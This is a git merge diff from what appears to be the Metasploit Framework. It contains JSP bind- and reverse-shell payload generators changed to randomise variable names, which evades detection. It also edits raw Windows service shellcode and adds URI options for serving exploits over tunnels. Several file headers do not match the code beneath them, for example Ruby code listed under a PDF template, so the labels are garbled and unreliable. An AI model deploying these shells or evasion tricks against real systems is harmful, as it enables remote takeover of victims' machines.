Merge remote-tracking branch 'upstream/master'

Author: Meatballs1

.gitignore

@@ -7,6 +7,12 @@ Gemfile.local.lock
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
 # YARD cache directory
 .yardoc
 # Mac OS X files

.travis.yml

@@ -24,7 +24,6 @@ script: "bundle exec rake $RAKE_TASK"
 
 rvm:
   - '1.9.3'
-  - '2.0'
   - '2.1'
 
 notifications:

Gemfile

@@ -3,8 +3,6 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec
 
-gem 'rb-readline', require: false
-
 group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'

Gemfile.lock

@@ -232,7 +232,6 @@ DEPENDENCIES
   pg (>= 0.11)
   pry
   rake (>= 10.0.0)
-  rb-readline
   redcarpet
   rspec (>= 2.12, < 3.0.0)
   rspec-rails (>= 2.12, < 3.0.0)

data/exploits/CVE-2010-1240/template.pdf

@@ -38,10 +38,11 @@ def get_eicar_exe
     obfus_eicar.join("-").upcase
   end
 
-  def get_custom_exe(path=nil)
+  def get_custom_exe(path = nil)
     path ||= datastore['EXE::Custom']
     print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
     datastore['DisablePayloadHandler'] = true
+    exe = nil
     ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
     exe
   end
@@ -160,7 +161,7 @@ def exe_init_options(opts)
   end
 
   def exe_post_generation(opts)
-    if (opts[:fellback])
+    if opts[:fellback]
       print_status("Warning: Falling back to default template: #{opts[:fellback]}")
     end
   end

lib/msf/core/exploit/exe.rb

@@ -37,6 +37,11 @@ def initialize(info = {})
       ], Exploit::Remote::HttpServer
     )
 
+    register_advanced_options([
+      OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']),
+      OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)'])
+    ])
+
     # Used to keep track of resources added to the service manager by
     # this module. see #add_resource and #cleanup
     @my_resources = []
@@ -76,6 +81,11 @@ def print_status(msg='')
   end
   # :category: print_* overrides
   # Prepends client and module name if inside a thread with a #cli
+  def print_good(msg='')
+    (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
+  end
+  # :category: print_* overrides
+  # Prepends client and module name if inside a thread with a #cli
   def print_error(msg='')
     (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
   end
@@ -103,6 +113,11 @@ def vprint_status(msg='')
   end
   # :category: print_* overrides
   # Prepends client and module name if inside a thread with a #cli
+  def vprint_good(msg='')
+    (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
+  end
+  # :category: print_* overrides
+  # Prepends client and module name if inside a thread with a #cli
   def vprint_error(msg='')
     (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
   end
@@ -449,7 +464,9 @@ def get_resource
   def get_uri(cli=self.cli)
     ssl = !!(datastore["SSL"])
     proto = (ssl ? "https://" : "http://")
-    if (cli and cli.peerhost)
+    if datastore['URIHOST']
+      host = datastore['URIHOST']
+    elsif (cli and cli.peerhost)
       host = Rex::Socket.source_address(cli.peerhost)
     else
       host = srvhost_addr
@@ -459,7 +476,9 @@ def get_uri(cli=self.cli)
       host = "[#{host}]"
     end
 
-    if (ssl and datastore["SRVPORT"] == 443)
+    if datastore['URIPORT']
+      port = ':' + datastore['URIPORT'].to_s
+    elsif (ssl and datastore["SRVPORT"] == 443)
       port = ''
     elsif (!ssl and datastore["SRVPORT"] == 80)
       port = ''
@@ -494,7 +513,9 @@ def get_uri(cli=self.cli)
   #
   # @return [String]
   def srvhost_addr
-    if (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
+    if datastore['URIHOST']
+      host = datastore['URIHOST']
+    elsif (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
       host = datastore["LHOST"]
     else
       if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")

lib/msf/core/exploit/http/server.rb

@@ -87,6 +87,9 @@ def self.from_a(ary)
 
   #
   # Initialize the site reference.
+  # If you're updating the references, please also update:
+  # * tools/module_reference.rb
+  # * https://github.com/rapid7/metasploit-framework/wiki/Metasploit-module-reference-identifiers
   #
   def initialize(in_ctx_id = 'Unknown', in_ctx_val = '')
     self.ctx_id  = in_ctx_id

lib/msf/core/module/reference.rb

@@ -22,6 +22,12 @@ def initialize(info = {})
   # @return [String] jsp code that executes bind TCP payload
   def jsp_bind_tcp
     # Modified from: http://www.security.org.sg/code/jspreverse.html
+
+    var_is = Rex::Text.rand_text_alpha_lower(2)
+    var_os = Rex::Text.rand_text_alpha_lower(2)
+    var_in = Rex::Text.rand_text_alpha_lower(2)
+    var_out = Rex::Text.rand_text_alpha_lower(3)
+
     jsp = <<-EOS
 <%@page import="java.lang.*"%>
 <%@page import="java.util.*"%>
@@ -31,37 +37,37 @@ def jsp_bind_tcp
 <%
   class StreamConnector extends Thread
   {
-    InputStream is;
-    OutputStream os;
+    InputStream #{var_is};
+    OutputStream #{var_os};
 
-    StreamConnector( InputStream is, OutputStream os )
+    StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
     {
-      this.is = is;
-      this.os = os;
+      this.#{var_is} = #{var_is};
+      this.#{var_os} = #{var_os};
     }
 
     public void run()
     {
-      BufferedReader in  = null;
-      BufferedWriter out = null;
+      BufferedReader #{var_in}  = null;
+      BufferedWriter #{var_out} = null;
       try
       {
-        in  = new BufferedReader( new InputStreamReader( this.is ) );
-        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        #{var_in}  = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
+        #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
         char buffer[] = new char[8192];
         int length;
-        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
         {
-          out.write( buffer, 0, length );
-          out.flush();
+          #{var_out}.write( buffer, 0, length );
+          #{var_out}.flush();
         }
       } catch( Exception e ){}
       try
       {
-        if( in != null )
-          in.close();
-        if( out != null )
-          out.close();
+        if( #{var_in} != null )
+          #{var_in}.close();
+        if( #{var_out} != null )
+          #{var_out}.close();
       } catch( Exception e ){}
     }
   }
@@ -87,6 +93,12 @@ class StreamConnector extends Thread
   # @return [String] jsp code that executes reverse TCP payload
   def jsp_reverse_tcp
     # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
+
+    var_is = Rex::Text.rand_text_alpha_lower(2)
+    var_os = Rex::Text.rand_text_alpha_lower(2)
+    var_in = Rex::Text.rand_text_alpha_lower(2)
+    var_out = Rex::Text.rand_text_alpha_lower(3)
+
     jsp = <<-EOS
 <%@page import="java.lang.*"%>
 <%@page import="java.util.*"%>
@@ -96,37 +108,37 @@ def jsp_reverse_tcp
 <%
   class StreamConnector extends Thread
   {
-    InputStream is;
-    OutputStream os;
+    InputStream #{var_is};
+    OutputStream #{var_os};
 
-    StreamConnector( InputStream is, OutputStream os )
+    StreamConnector( InputStream #{var_is}, OutputStream #{var_os} )
     {
-      this.is = is;
-      this.os = os;
+      this.#{var_is} = #{var_is};
+      this.#{var_os} = #{var_os};
     }
 
     public void run()
     {
-      BufferedReader in  = null;
-      BufferedWriter out = null;
+      BufferedReader #{var_in}  = null;
+      BufferedWriter #{var_out} = null;
       try
       {
-        in  = new BufferedReader( new InputStreamReader( this.is ) );
-        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        #{var_in}  = new BufferedReader( new InputStreamReader( this.#{var_is} ) );
+        #{var_out} = new BufferedWriter( new OutputStreamWriter( this.#{var_os} ) );
         char buffer[] = new char[8192];
         int length;
-        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        while( ( length = #{var_in}.read( buffer, 0, buffer.length ) ) > 0 )
         {
-          out.write( buffer, 0, length );
-          out.flush();
+          #{var_out}.write( buffer, 0, length );
+          #{var_out}.flush();
         }
       } catch( Exception e ){}
       try
       {
-        if( in != null )
-          in.close();
-        if( out != null )
-          out.close();
+        if( #{var_in} != null )
+          #{var_in}.close();
+        if( #{var_out} != null )
+          #{var_out}.close();
       } catch( Exception e ){}
     }
   }

lib/msf/core/payload/jsp.rb

@@ -558,7 +558,7 @@ def self.to_win32pe_service(framework, code, opts = {})
         "\x8D\x85#{[svcmain_code_offset].pack('<I')}\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
         "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
         "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED" +
-        "{[hash_code_offset].pack('<I') + pushed_service_name}\x89\xE1\x8D" +
+        "#{[hash_code_offset].pack('<I') + pushed_service_name}\x89\xE1\x8D" +
         "\x85#{[svcctrlhandler_code_offset].pack('<I')}\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
         "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
         "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
@@ -568,7 +568,7 @@ def self.to_win32pe_service(framework, code, opts = {})
         "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
         "\x40\x68\x00\x10\x00\x00\x68#{[code.length].pack('<I')}\x57\x51\x68\xAE\x87" +
         "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
-        "{[shellcode_code_offset].pack('<I')}\x54\x68#{[code.length].pack('<I')}" +
+        "#{[shellcode_code_offset].pack('<I')}\x54\x68#{[code.length].pack('<I')}" +
         "\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
         "\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
         "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +